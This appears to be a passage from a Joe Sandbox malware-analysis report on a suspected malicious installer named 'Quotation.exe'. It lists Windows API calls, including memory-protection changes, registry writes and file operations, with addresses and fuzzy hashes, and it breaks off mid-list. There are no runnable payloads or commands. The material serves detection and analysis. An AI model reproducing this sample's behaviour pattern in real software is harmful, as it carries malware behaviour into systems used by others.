                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                              • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                              • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                              • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                              APIs
                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                              • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                              • Opcode Fuzzy Hash: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                              • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 004063E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction ID: 82e02668318ada1346e4ec156b308e726a090f155bb9469a8f3968b5644ca969
                                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction Fuzzy Hash: 86E0B6B2010109BFEF195F90ED5ADBB761DEB08250F01492EF916E4091E6B5E930A674
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(7342505C,00000004,00000040,7342504C), ref: 73422A9D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                               • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: e860d709cf0a501fa2f9338810a5de206db776d1a0c6215011c9821780532a20
                                                              • Instruction ID: 753dbcaa23ae11ad3a4eca4b4174f3f8af6c8760f91597a088764239f0d683bd
                                                              • Opcode Fuzzy Hash: e860d709cf0a501fa2f9338810a5de206db776d1a0c6215011c9821780532a20
                                                              • Instruction Fuzzy Hash: 36F0A5F2500280DEC358EF2A8C44B09BFE0B76A395B2545AAE19CF6243E3344044CFA9
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                              • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                              • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                              • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
                                                              • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                              • Opcode Fuzzy Hash: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
                                                              • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                              • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                              • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                              • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                              • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                              • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                              • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                              • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                              • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                              • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                              • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                                                              • Opcode Fuzzy Hash: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                              • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: a6fe6385f725ccf70f09e7bcd71ccddde0cc44320f77ce8e82191fcfeabd6ce4
                                                              • Instruction ID: 46647c8aa29ad1483f3bf2024eba745d901509e4d7702d92665c01dfaa7ba020
                                                              • Opcode Fuzzy Hash: a6fe6385f725ccf70f09e7bcd71ccddde0cc44320f77ce8e82191fcfeabd6ce4
                                                              • Instruction Fuzzy Hash: B5B012B26000009FEE04AB15DC0AF3432D4F710304F240040B608F1142C12048008924
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                              • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                • Part of subcall function 004067CF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                              • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
